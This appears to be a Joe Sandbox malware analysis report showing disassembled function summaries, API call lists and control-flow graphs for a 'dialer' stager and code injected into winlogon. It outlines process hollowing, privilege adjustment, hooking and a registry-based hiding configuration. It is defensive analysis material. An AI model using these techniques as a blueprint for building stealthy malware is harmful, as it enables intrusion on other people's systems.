                                                      • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                      • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                      • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                      • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                      • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                      • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                      • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                      • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                      • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                      • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                      • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                      • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                      • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                      • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                      • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                    • ExitProcess.KERNEL32 ref: 0000000140002263
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                    • String ID:
                                                    • API String ID: 3836936051-0
                                                    • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                    • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                    • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                    • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                    Non-executed Functions

                                                    Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                    • String ID: SOFTWARE$dialerstager$open
                                                    • API String ID: 3276259517-3931493855
                                                    • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                    • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                    • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                    • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                    Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                    • String ID: @
                                                    • API String ID: 3462610200-2766056989
                                                    • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                    • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                    • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                    • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                    Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                    • String ID: dialersvc64
                                                    • API String ID: 4184240511-3881820561
                                                    • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                    • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                    • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                    • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                    Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: Delete$CloseEnumOpen
                                                    • String ID: SOFTWARE\dialerconfig
                                                    • API String ID: 3013565938-461861421
                                                    • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                    • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                    • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                    • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                    Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: File$Write$CloseCreateHandle
                                                    • String ID: \\.\pipe\dialercontrol_redirect64
                                                    • API String ID: 148219782-3440882674
                                                    • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                    • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                    • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                    • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                    Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001C.00000002.3030294425.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 0000001C.00000002.3029886746.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3030819862.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001C.00000002.3031251085.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_28_2_140000000_dialer.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ntdll.dll
                                                    • API String ID: 1646373207-2227199552
                                                    • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                    • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                    • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                    • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                    Execution Graph

                                                    Execution Coverage:1.4%
                                                    Dynamic/Decrypted Code Coverage:95.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:124
                                                    Total number of Limit Nodes:16
                                                    execution_graph 16888 2e99172273c 16889 2e99172276a 16888->16889 16890 2e9917227c5 VirtualAlloc 16889->16890 16893 2e9917228d4 16889->16893 16892 2e9917227ec 16890->16892 16890->16893 16891 2e991722858 LoadLibraryA 16891->16892 16892->16891 16892->16893 16894 2e99175554d 16896 2e991755554 16894->16896 16895 2e9917555bb 16896->16895 16897 2e991755637 VirtualProtect 16896->16897 16898 2e991755671 16897->16898 16899 2e991755663 GetLastError 16897->16899 16899->16898 16900 2e991755cf0 16901 2e991755cfd 16900->16901 16902 2e991755d09 16901->16902 16911 2e991755e1a 16901->16911 16903 2e991755d3e 16902->16903 16904 2e991755d8d 16902->16904 16905 2e991755d66 SetThreadContext 16903->16905 16905->16904 16906 2e991755efe 16908 2e991755f1e 16906->16908 16920 2e9917543e0 16906->16920 16907 2e991755e41 VirtualProtect FlushInstructionCache 16907->16911 16916 2e991754df0 GetCurrentProcess 16908->16916 16911->16906 16911->16907 16912 2e991755f23 16913 2e991755f37 ResumeThread 16912->16913 16915 2e991755f77 _log10_special 16912->16915 16914 2e991755f6b 16913->16914 16914->16912 16917 2e991754e0c 16916->16917 16918 2e991754e22 VirtualProtect FlushInstructionCache 16917->16918 16919 2e991754e53 16917->16919 16918->16917 16919->16912 16922 2e9917543fc 16920->16922 16921 2e99175445f 16921->16908 16922->16921 16923 2e991754412 VirtualFree 16922->16923 16923->16922 16924 2e991753ab9 16927 2e991753a06 16924->16927 16925 2e991753a70 16926 2e991753a56 VirtualQuery 16926->16925 16926->16927 16927->16925 16927->16926 16928 2e991753a8a VirtualAlloc 16927->16928 16928->16925 16929 2e991753abb GetLastError 16928->16929 16929->16925 16929->16927 16930 2e991751abc 16936 2e991751628 GetProcessHeap 16930->16936 16932 2e991751ad2 Sleep SleepEx 16934 2e991751acb 16932->16934 16934->16932 16935 2e991751598 StrCmpIW StrCmpW 16934->16935 16981 2e9917518b4 16934->16981 16935->16934 16937 2e991751648 _invalid_parameter_noinfo 16936->16937 16998 2e991751268 GetProcessHeap 16937->16998 16939 2e991751650 16940 2e991751268 2 API calls 16939->16940 16941 2e991751661 16940->16941 16942 2e991751268 2 API calls 16941->16942 16943 2e99175166a 16942->16943 16944 2e991751268 2 API calls 16943->16944 16945 2e991751673 16944->16945 16946 2e99175168e RegOpenKeyExW 16945->16946 16947 2e9917516c0 RegOpenKeyExW 16946->16947 16948 2e9917518a6 16946->16948 16949 2e9917516ff RegOpenKeyExW 16947->16949 16950 2e9917516e9 16947->16950 16948->16934 16952 2e99175173a RegOpenKeyExW 16949->16952 16953 2e991751723 16949->16953 17009 2e9917512bc RegQueryInfoKeyW 16950->17009 16956 2e99175175e 16952->16956 16957 2e991751775 RegOpenKeyExW 16952->16957 17002 2e99175104c RegQueryInfoKeyW 16953->17002 16954 2e9917516f5 RegCloseKey 16954->16949 16958 2e9917512bc 11 API calls 16956->16958 16959 2e9917517b0 RegOpenKeyExW 16957->16959 16960 2e991751799 16957->16960 16962 2e99175176b RegCloseKey 16958->16962 16964 2e9917517eb RegOpenKeyExW 16959->16964 16965 2e9917517d4 16959->16965 16963 2e9917512bc 11 API calls 16960->16963 16962->16957 16966 2e9917517a6 RegCloseKey 16963->16966 16968 2e99175180f 16964->16968 16969 2e991751826 RegOpenKeyExW 16964->16969 16967 2e9917512bc 11 API calls 16965->16967 16966->16959 16970 2e9917517e1 RegCloseKey 16967->16970 16971 2e99175104c 4 API calls 16968->16971 16972 2e99175184a 16969->16972 16973 2e991751861 RegOpenKeyExW 16969->16973 16970->16964 16977 2e99175181c RegCloseKey 16971->16977 16974 2e99175104c 4 API calls 16972->16974 16975 2e99175189c RegCloseKey 16973->16975 16976 2e991751885 16973->16976 16978 2e991751857 RegCloseKey 16974->16978 16975->16948 16979 2e99175104c 4 API calls 16976->16979 16977->16969 16978->16973 16980 2e991751892 RegCloseKey 16979->16980 16980->16975 17027 2e9917514a4 16981->17027 17020 2e991766168 16998->17020 17001 2e9917512ae _invalid_parameter_noinfo 17001->16939 17003 2e9917510bf 17002->17003 17004 2e9917511b5 RegCloseKey 17002->17004 17003->17004 17005 2e9917510cf RegEnumValueW 17003->17005 17004->16952 17007 2e991751125 _invalid_parameter_noinfo __free_lconv_mon 17005->17007 17006 2e99175114e GetProcessHeap 17006->17007 17007->17004 17007->17005 17007->17006 17008 2e99175116e GetProcessHeap 17007->17008 17008->17007 17010 2e99175148a __free_lconv_mon 17009->17010 17011 2e991751327 GetProcessHeap 17009->17011 17010->16954 17017 2e99175133e _invalid_parameter_noinfo __free_lconv_mon 17011->17017 17012 2e991751476 GetProcessHeap 17012->17010 17013 2e991751352 RegEnumValueW 17013->17017 17015 2e99175141e lstrlenW GetProcessHeap 17015->17017 17016 2e9917513d3 GetProcessHeap 17016->17017 17017->17012 17017->17013 17017->17015 17017->17016 17018 2e9917513f3 GetProcessHeap 17017->17018 17019 2e991751443 StrCpyW 17017->17019 17022 2e99175152c 17017->17022 17018->17017 17019->17017 17021 2e991751283 GetProcessHeap 17020->17021 17021->17001 17023 2e991751546 17022->17023 17026 2e99175157c 17022->17026 17024 2e99175155d StrCmpIW 17023->17024 17025 2e991751565 StrCmpW 17023->17025 17023->17026 17024->17023 17025->17023 17026->17017 17028 2e9917514e1 GetProcessHeap 17027->17028 17029 2e9917514c1 GetProcessHeap 17027->17029 17033 2e991766180 17028->17033 17030 2e9917514da __free_lconv_mon 17029->17030 17030->17028 17030->17029 17034 2e9917514f6 GetProcessHeap HeapFree 17033->17034 17035 2e9917528c8 17037 2e99175290e 17035->17037 17036 2e991752970 17037->17036 17039 2e991753844 17037->17039 17040 2e991753851 StrCmpNIW 17039->17040 17041 2e991753866 17039->17041 17040->17041 17041->17037

                                                    Executed Functions

                                                    Function 000002E991751628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                    • API String ID: 106492572-2879589442
                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction ID: 54b8228711d56d83d96e028295ec185cd7547312acf9b7e7a1458d33eaddbd6f
                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction Fuzzy Hash: A0713036354B9285EB10AF67E858A5D3374F784BC9F82112AED4E87B6ADF34C484CB50
                                                    Function 000002E991753790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                    • String ID: wr
                                                    • API String ID: 1092925422-2678910430
                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction ID: 889b996a8caf1a720874174e44a79219beab5574743a7c3e537098b2f91f301b
                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction Fuzzy Hash: 85115E2674478682EF189B12E40866962B0F748BC5F86042EEE8947766EF3DC585CB24
                                                    Function 000002E991755B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 59 2e991755b30-2e991755b57 60 2e991755b59-2e991755b68 59->60 61 2e991755b6b-2e991755b76 GetCurrentThreadId 59->61 60->61 62 2e991755b78-2e991755b7d 61->62 63 2e991755b82-2e991755b89 61->63 64 2e991755faf-2e991755fc6 call 2e991757940 62->64 65 2e991755b9b-2e991755baf 63->65 66 2e991755b8b-2e991755b96 call 2e991755960 63->66 69 2e991755bbe-2e991755bc4 65->69 66->64 70 2e991755bca-2e991755bd3 69->70 71 2e991755c95-2e991755cb6 69->71 74 2e991755c1a-2e991755c8d call 2e991754510 call 2e9917544b0 call 2e991754470 70->74 75 2e991755bd5-2e991755c18 call 2e9917585c0 70->75 79 2e991755e1f-2e991755e30 call 2e9917574bf 71->79 80 2e991755cbc-2e991755cdc GetThreadContext 71->80 88 2e991755c90 74->88 75->88 91 2e991755e35-2e991755e3b 79->91 81 2e991755e1a 80->81 82 2e991755ce2-2e991755d03 80->82 81->79 82->81 90 2e991755d09-2e991755d12 82->90 88->69 94 2e991755d92-2e991755da3 90->94 95 2e991755d14-2e991755d25 90->95 96 2e991755efe-2e991755f0e 91->96 97 2e991755e41-2e991755e98 VirtualProtect FlushInstructionCache 91->97 103 2e991755e15 94->103 104 2e991755da5-2e991755dc3 94->104 99 2e991755d8d 95->99 100 2e991755d27-2e991755d3c 95->100 106 2e991755f1e-2e991755f2a call 2e991754df0 96->106 107 2e991755f10-2e991755f17 96->107 101 2e991755e9a-2e991755ea4 97->101 102 2e991755ec9-2e991755ef9 call 2e9917578ac 97->102 99->103 100->99 110 2e991755d3e-2e991755d88 call 2e991753970 SetThreadContext 100->110 101->102 111 2e991755ea6-2e991755ec1 call 2e991754390 101->111 102->91 104->103 112 2e991755dc5-2e991755e10 call 2e991753900 call 2e9917574dd 104->112 120 2e991755f2f-2e991755f35 106->120 107->106 108 2e991755f19 call 2e9917543e0 107->108 108->106 110->99 111->102 112->103 124 2e991755f77-2e991755f95 120->124 125 2e991755f37-2e991755f75 ResumeThread call 2e9917578ac 120->125 128 2e991755fa9 124->128 129 2e991755f97-2e991755fa6 124->129 125->120 128->64 129->128
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000023.00000002.3042246712.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_35_2_2e991750000_winlogon.jbxd
                                                    Similarity
                                                    • API ID: Thread$Current$Context
                                                    • String ID:
                                                    • API String ID: 1666949209-0
                                                    • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                    • Instruction ID: 1cfaaca5a2e5f2dbf610dce76985e3aebf4ce61cea1ed6e8382bb37d242726a6
                                                    • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                    • Instruction Fuzzy Hash: 25D19C76244B8982DA70DB06E49835A77B0F388B84F52411BEACD47BA6DF3CC591CF50
                                                    Function 000002E9917550D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 131 2e9917550d0-2e9917550fc 132 2e9917550fe-2e991755106 131->132 133 2e99175510d-2e991755116 131->133 132->133 134 2e991755118-2e991755120 133->134 135 2e991755127-2e991755130 133->135 134->135 136 2e991755132-2e99175513a 135->136 137 2e991755141-2e99175514a 135->137 136->137 138 2e99175514c-2e991755151 137->138 139 2e991755156-2e991755161 GetCurrentThreadId 137->139 140 2e9917556d3-2e9917556da 138->140 141 2e99175516d-2e991755174 139->141 142 2e991755163-2e991755168 139->142 143 2e991755176-2e99175517c 141->143 144 2e991755181-2e99175518a 141->144 142->140 143->140 145 2e99175518c-2e991755191 144->145 146 2e991755196-2e9917551a2 144->146 145->140 147 2e9917551ce-2e991755225 call 2e9917556e0 * 2 146->147 148 2e9917551a4-2e9917551c9 146->148 153 2e99175523a-2e991755243 147->153 154 2e991755227-2e99175522e 147->154 148->140 157 2e991755255-2e99175525e 153->157 158 2e991755245-2e991755252 153->158 155 2e991755230 154->155 156 2e991755236 154->156 161 2e9917552b0-2e9917552b6 155->161 162 2e9917552a6-2e9917552aa 156->162 159 2e991755260-2e991755270 157->159 160 2e991755273-2e991755298 call 2e991757870 157->160 158->157 159->160 170 2e99175529e 160->170 171 2e99175532d-2e991755342 call 2e991753cc0 160->171 164 2e9917552e5-2e9917552eb 161->164 165 2e9917552b8-2e9917552d4 call 2e991754390 161->165 162->161 168 2e9917552ed-2e99175530c call 2e9917578ac 164->168 169 2e991755315-2e991755328 164->169 165->164 175 2e9917552d6-2e9917552de 165->175 168->169 169->140 170->162 178 2e991755351-2e99175535a 171->178 179 2e991755344-2e99175534c 171->179 175->164 180 2e99175536c-2e9917553ba call 2e991758c60 178->180 181 2e99175535c-2e991755369 178->181 179->162 184 2e9917553c2-2e9917553ca 180->184 181->180 185 2e9917553d0-2e9917554bb call 2e991757440 184->185 186 2e9917554d7-2e9917554df 184->186 198 2e9917554bd 185->198 199 2e9917554bf-2e9917554ce call 2e991754060 185->199 187 2e9917554e1-2e9917554f4 call 2e991754590 186->187 188 2e991755523-2e99175552b 186->188 202 2e9917554f6 187->202 203 2e9917554f8-2e991755521 187->203 191 2e99175552d-2e991755535 188->191 192 2e991755537-2e991755546 